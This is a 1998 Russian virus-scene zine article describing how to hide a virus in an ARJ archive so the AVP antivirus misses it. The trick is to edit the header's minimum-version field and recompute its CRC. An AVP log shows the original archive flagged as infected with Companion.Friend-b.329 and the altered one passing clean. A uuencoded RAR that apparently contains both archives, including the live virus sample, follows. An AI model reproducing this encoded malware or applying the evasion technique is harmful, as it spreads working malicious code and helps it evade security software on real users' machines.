[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 9, Dec 1998                                           file 00D

                         Как спрятать в ARJ вирус...
                                                    by VVS

     Я  тестировал  на  arj  v2.41(2.50,2.8)  и avplite b125 (avp for win.3x).
Меняю в заголовке архива minimum version need to extract (обычно там стоит 1),
и  подсчитываю  новое значение crc32header. К тому же avp не считает этот файл
архивом. Вот мой тестовый экземпляр:
test_1.arj - до "юзания"
test_2.arj - после "юзания"
в 1-м вирус детектится,во 2-м - нет

=== Cut ===
■ Antiviral Toolkit Pro by Eugene Kaspersky  Версия ■ Отчет: ■ Командная
строка:
C:\ANTIVIR\AVP3.DOS\AVPLITE.EXE : упакован Diet
C:\ANTIVIR\AVP3.DOS\AVPLITE.EXE : в порядке
C:  ░ Boot Sector : в порядке
HDD1░ Master Boot Record : в порядке
HDD1░ Active Boot Sector : в порядке
C:\UTILITY\55\TEST_1.ARJ : архив ARJ
C:\UTILITY\55\TEST_1.ARJ\1riend-b.co~ : инфицирован Companion.Friend-b.329
C:\UTILITY\55\TEST_2.ARJ : в порядке

Обнаружено:         1 вирусов

 Проверено:         3 файлов
>                    1 архивов
                    1 каталогов
                    0 килобайт

     Время:  00:00:00
=== Cut ===

=== Cut ===
            Имя исходного файла : TEST.RAR
                         Размер : 2521 (3Kb)
                  Дата создания : 02-Дек-98 15:12:04
               Дата кодирования : 02-Дек-98 15:12:07
                 Размер UU-кода : 4Kb
              Количество секций : 1
     Число строк в одной секции : 57


section 1 of file test.rar  < uuencode by Dos Navigator >

filetime 629307778
begin 644 test.rar
M4F%R(1H'`"M[<T(`X@$````````P%'4``-4!XP44-*O5$4$,R,P````!4_YF
M3@[X!<G"[P.\!`CMCM@%Q@2R<_O"VP.+2%D&R6I-,A)F4)\V_9\-M"6K=23?
M$?+[W,6I<"SYC9?RUJWQ;,6/79@[*X:6]YB"'PE2OJE+Y9BF5=A6_P'N53=?
M[&66#`*$W,\W+CW0/V(_:MUB@K%?<`NO.%=NY.XJ[R5">@O;I3#2HM98$)FN
MEKW!>.V=0_C&!$@QM@&)^*8!`X;IK)4V=E=-Z@PPQU.\8R#'M>%.=0=[MN/G
M^OZ]$C;N_03'HORQ]6[NAA!/9'+PYH[+C5!A`+9AI2YE5)5PLJ*=X;5>17LB
M$'?MLZ$$HM'=0"2EZ3<Z7A*7L@P[TF)QA*22!(NJDBX8I_!QQA*29%V_^]6,
M,(>ZU;JY'1U0&Z(U?8R%L!M0/5'_;('EJ1,:!,7*V'-%+)/`B1@<NV2I-'Q[
M&Q":)CS"W.F7U@9W@V%N.B?4=A<`RD^T\5#=0ZSLN:6BXX97I!@`G*AH]&+$
ME'O.;S0T6@36Y"Q'!N-)*Q(;4TD]P+I!>F(67%0E)^:+3G(TDTA-:->D@$W,
MVALA6T\MN@;P%J;<!Y=7N99X]&3[3\=L$:`J1MB!2_#=I1-[:,^8-WMT`(`J
M`+X!``"^`0```$;FGJ58>8(E%#`*`"````!415-47S$N05)*8.HH`!X'`0`0
M``)86'F")5AY@B4``````````````````%1%4U0N05)*``#A3>ZL``!@ZBP`
M'@<!`!`!`%C':7`E4@$``#P"``!$C;];```@````,5))14Y$+4(N0T]^```;
MDFKE```!-V)]]8EOG_[W,GTA6!+%8/GW$X%!&DF*24@N)A:JNI%2E(^JZ#@1
M4Y>P(6!CLBT(6>Q18(0L/L#W,<P*./LMHL$>!@L$$0T1U?FW\AA!ILKPS!+Q
MG&_%321G\<T<BI11'IOQP(4+/R\R$\XGHSZ%&I.1Y*8]JDDFE2'0Y!GR3QO#
MZ":/^GCDI)J4AGSE.%Z^_4G:$W@T(<J/*<L2#+D82V*%F"Y[?+"2(6\#?=)_
M%^P15P),6R@7UQ%[@3@,7A%EA:@H+M4=0)MB3<'F1^L:'XASATDW%HQBX&%Y
M@(^+RAO.B9+)W?#-)'MYX,G%S@80$7("T&M;T1+H"9.)L,G6@UV3K+CP4^:W
MVKZMF(PJL34IFJW\1KM^W7=KM](5=N>T=46;[]']?`K#"F;%P?"M]M6\;B`E
MMMK'QW5UCT=V+&S]*8;N=!<LG70"J`!,:,X/_&#J``"EFW0`@"H`O@$``+X!
M````1N:>I6%Y@B44,`H`(````%1%4U1?,BY!4DI@ZB@`'@<$`!```EA8>8(E
M6'F")0``````````````````5$535"Y!4DH``$A-UGH``&#J+``>!P$`$`$`
M6,=I<"52`0``/`(``$2-OUL``"`````Q4DE%3D0M0BY#3WX``!N2:N4```$W
M8GWUB6^?_O<R?2%8$L5@^?<3@4$:28I)2"XF%JJZD5*4CZKH.!%3E[`A8&.R
M+0A9[%%@A"P^P/<QS`HX^RVBP1X&"P01#1'5^;?R&$&FRO#,$O&<;\5-)&?Q
MS1R*E%$>F_'`A0L_+S(3SB>C/H4:DY'DICVJ22:5(=#D&?)/&\/H)H_Z>.2D
MFI2&?.4X7K[]2=H3>#0ARH\IRQ(,N1A+8H68+GM\L)(A;P-]TG\7[!%7`DQ;
M*!?7$7N!.`Q>$66%J"@NU1U`FV)-P>9'ZQH?B'.'23<6C&+@87F`CXO*&\Z)
MDLG=\,TD>WG@R<7.!A`1<@+0:UO1$N@)DXFPR=:#79.LN/!3YK?:OJV8C"JQ
M-2F:K?Q&NW[==VNWTA5VY[1U19OOT?U\"L,*9L7!\*WVU;QN("6VVL?'=76/
M1W8L;/TIANYT%RR==`*H`$QHS@_\8.H``$?2>`#`&@`&!```%`(``P```%!R
M;W1E8W0A5_TW)C(F565R,1H%6',"\6=8FX,E```````P%'4``-4!XP5`<?B!
M/P!>@LP`2$W7*?YF+N34!=?%[@.L!0BU2;%UXU:S<_O^V0.+#-2YDFI-$A)F
M4*YDM-I#\`CI6V>0;_+[QU?#E2SYC*"0JUAX`UIQJJI&"MZ$,OA[Z!K3_[,"
M;]'N>_Y`5;M_!Z/01HVN'5$3;.Y738_]-SO3.[WFKH^?ASIC,F^5R4SK\2-)
M?AK6M.4K%21`43]D9G'3B7'RAK7B8[G\JHL=J;B:\D9LIZH91$2#S:\.0DDO
M\L1AB$L'4Y):9@?^"+&FT=[(<OZ_1E@K8>B28R@1VH^Y/)VSN7&KCY^JMR+<
M3-X2-SJSFLGNUUI-$PH_S+;HLX;?#'^-_N`K)9.OOE(JM^?9K(I'&<LQ\&/9
M0;>:W`T:%]KVS,,`4F?;K#HVEM=+U2NGM%%U?3\K1+$VJ4_CN0)H!A6A@Z)7
MQ)I3`*C5;>?TI]##ZT-\D>9\<7$;_+="JOO#QF%O",IWH?AFY"8Z]]FI(DIS
M'OI=9Q)F66F86901*!7N2H+NG<.CD:,`<,\EUCN=O3TJ["<U>,H6$#SK*!KK
MI'(TDTA-:->D@$W,VALA6T\MN@;P%J;<!Y=7N99X]&3[3\=L$:`J1MB!2_#=
MI1-[:,^8-WMT`(`J`+X!``"^`0```$;FGJ58>8(E%#`*`"````!415-47S$N
M05)*8.HH`!X'`0`0``)86'F")5AY@B4``````````````````%1%4U0N05)*
M``#A3>ZL``!@ZBP`'@<!`!`!`%C':7`E4@$``#P"``!$C;];```@````,5))
M14Y$+4(N0T]^```;DFKE```!-V)]]8EOG_[W,GTA6!+%8/GW$X%!&DF*24@N
M)A:JNI%2E(^JZ#@14Y>P(6!CLBT(6>Q18(0L/L#W,<P*./LMHL$>!@L$$0T1
MU?FW\AA!ILKPS!+QG&_%321G\<T<BI11'IOQP(4+/R\R$\XGHSZ%&I.1Y*8]
MJDDFE2'0Y!GR3QO#Z":/^GCDI)J4AGSE.%Z^_4G:$W@T(<J/*<L2#+D82V*%
MF"Y[?+"2(6\#?=)_%^P15P),6R@7UQ%[@3@,7A%EA:@H+M4=0)MB3<'F1^L:
M'XASATDW%HQBX&%Y@(^+RAO.B9+)W?#-)'MYX,G%S@80$7("T&M;T1+H"9.)
ML,G6@UV3K+CP4^:WVKZMF(PJL34IFJW\1KM^W7=KM](5=N>T=46;[]']?`K#
M"F;%P?"M]M6\;B`EMMK'QW5UCT=V+&S]*8;N=!<LG70"J`!,:,X/_&#J``"E
MFW0`@"H`O@$``+X!````1N:>I6%Y@B44,`H`(````%1%4U1?,BY!4DI@ZB@`
!'@``
`
end
sum -r/size 36710/3503 section (from "begin" to "end")
sum -r/size 62492/2521 entire input file
=== Cut ===
